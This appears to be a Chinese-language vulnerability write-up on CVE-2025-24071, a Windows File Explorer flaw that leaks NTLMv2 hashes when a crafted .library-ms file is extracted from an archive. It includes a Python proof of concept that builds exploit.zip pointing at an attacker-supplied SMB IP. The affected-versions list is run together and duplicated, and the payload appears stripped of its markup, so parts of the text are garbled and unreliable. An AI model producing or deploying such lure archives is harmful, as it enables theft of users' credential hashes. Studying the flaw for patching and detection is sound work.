CVE-2025-24071|Windows 文件资源管理器欺骗漏洞(POC)
0x00 前言
Windows 文件资源管理器(File Explorer)作为Windows系统的关键组成部分,承担着管理与访问本地及网络文件资源的核心职能。它提供用户友好的图形界面,支持文件的浏览、复制、移动、删除、重命名等基本操作,同时集成了网络共享、外部设备识别、文件搜索与过滤等高级功能,是日常多任务文件处理不可或缺的工具。
0x01 漏洞概述
当用户使用Windows资源管理器解压含有恶意构造的
.library-ms文件的ZIP或RAR压缩包时,系统会自动解析该文件中嵌入的SMB路径(例如:\\192.168.1.116\shared),进而触发向远程服务器发起NTLM身份验证请求,造成用户的NTLMv2哈希值在无交互情况下被泄露。
0x02 CVE编号
CVE-2025-24071
0x03 受影响版本
Windows Server 2012 R2 (Server Core installation)Windows Server 2012 R2Windows Server 2016 (Server Core installation)Windows Server 2016Windows10 Version 1607 for x64-based SystemsWindows 10 Version 1607 for 32-bit SystemsWindows 10 for x64-based SystemsWindows 10 for 32-bit SystemsWindows Server 2025Windows 11 Version 24H2 for x64-based SystemsWindows 11 Version 24H2 for ARM64-based SystemsWindows Server 2025, 23H2 Edition (Server Core installation)Windows 11 Version 23H2 for x64-based SystemsWindows 11 Version 23H2 for ARM64-based SystemsWindows Server 2025 (Server Core installation)Windows 10 Version 22H2 for 32-bit SystemsWindows 10 Version 22H2 for ARM64-based SystemsWindows 10 Version 22H2 for x64-based SystemsWindows 11 Version 22H2 for x64-based SystemsWindows 11 Version 22H2 for ARM64-based SystemsWindows 10 Version 21H2 for x64-based SystemsWindows 10 Version 21H2 for ARM64-based SystemsWindows 10 Version 21H2 for 32-bit SystemsWindows Server 2025 (Server Core installation)Windows Server 2025Windows Server 2019 (Server Core installation)Windows Server 2019Windows 10 Version 1809 for x64-based SystemsWindows 10 Version 1809 for 32-bit Systems
10 Version 1607 for x64-based SystemsWindows 10 Version 1607 for 32-bit SystemsWindows 10 for x64-based SystemsWindows 10 for 32-bit SystemsWindows Server 2025Windows 11 Version 24H2 for x64-based SystemsWindows 11 Version 24H2 for ARM64-based SystemsWindows Server 2025, 23H2 Edition (Server Core installation)Windows 11 Version 23H2 for x64-based SystemsWindows 11 Version 23H2 for ARM64-based SystemsWindows Server 2025 (Server Core installation)Windows 10 Version 22H2 for 32-bit SystemsWindows 10 Version 22H2 for ARM64-based SystemsWindows 10 Version 22H2 for x64-based SystemsWindows 11 Version 22H2 for x64-based SystemsWindows 11 Version 22H2 for ARM64-based SystemsWindows 10 Version 21H2 for x64-based SystemsWindows 10 Version 21H2 for ARM64-based SystemsWindows 10 Version 21H2 for 32-bit SystemsWindows Server 2025 (Server Core installation)Windows Server 2025Windows Server 2019 (Server Core installation)Windows Server 2019Windows 10 Version 1809 for x64-based SystemsWindows 10 Version 1809 for 32-bit Systems0x04 漏洞利用示例(POC)
项目地址:
https://www./link/35f4421c476ab29bd7492717ccb0642c
import os
import zipfile
def main():
file_name = input("Enter your file name: ")
ip_address = input("Enter IP (EX: 192.168.1.162): ")
library_content = f"""
\\\\{ip_address}\\shared
"""
library_file_name = f"{file_name}.library-ms"
with open(library_file_name, "w", encoding="utf-8") as f:
f.write(library_content)
with zipfile.ZipFile("exploit.zip", mode="w", compression=zipfile.ZIP_DEFLATED) as zipf:
zipf.write(library_file_name)
if os.path.exists(library_file_name):
os.remove(library_file_name)
print("completed")
if __name__ == "__main__":
main()0x05 参考资料
https://www./link/f08f86e95c9d083c89f058285f9ff636
